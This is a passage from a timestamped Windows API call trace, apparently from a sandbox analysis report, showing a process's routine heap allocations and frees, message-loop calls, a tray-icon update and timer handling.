hHeap=0x8a0000) returned 1 [0163.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0163.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0163.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0163.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0163.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0163.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0163.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0163.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0163.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0163.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0163.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0163.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0163.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0163.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0163.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0163.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0163.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0163.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0163.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0163.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0163.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0163.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0163.700] FreeLibrary (hLibModule=0x75990000) returned 1 [0163.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0163.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0163.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0163.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0163.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0163.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0163.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0163.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0163.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0163.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0163.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0163.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0163.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0163.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0163.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0163.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0163.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0163.702] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 1 [0163.702] TranslateMessage (lpMsg=0x87ee3c) returned 0 [0163.702] DispatchMessageW (lpMsg=0x87ee3c) returned 0x0 [0163.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0163.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0163.702] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e4d8) returned 1 [0163.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0163.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0163.703] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0163.703] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0163.703] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0163.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0163.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0163.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0163.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0163.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0163.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0163.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0163.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0163.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0163.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0163.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0163.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0163.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0163.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0163.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0163.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0163.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0163.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0163.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0163.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0163.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0163.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0163.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0163.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0163.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0163.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0163.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0163.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0163.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0163.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0163.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0163.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0163.707] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0163.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0163.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0163.707] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0163.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0163.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0163.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0163.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0163.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0163.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0163.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0163.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0163.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19f0 [0163.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0163.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0163.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0163.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0163.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0163.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0163.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0163.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0163.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0163.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0163.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0163.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0163.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0163.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0163.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0163.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0163.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0163.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0163.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0163.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0163.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a20 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0163.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0163.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0163.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0163.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0163.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0163.711] RtlAllocateHeap 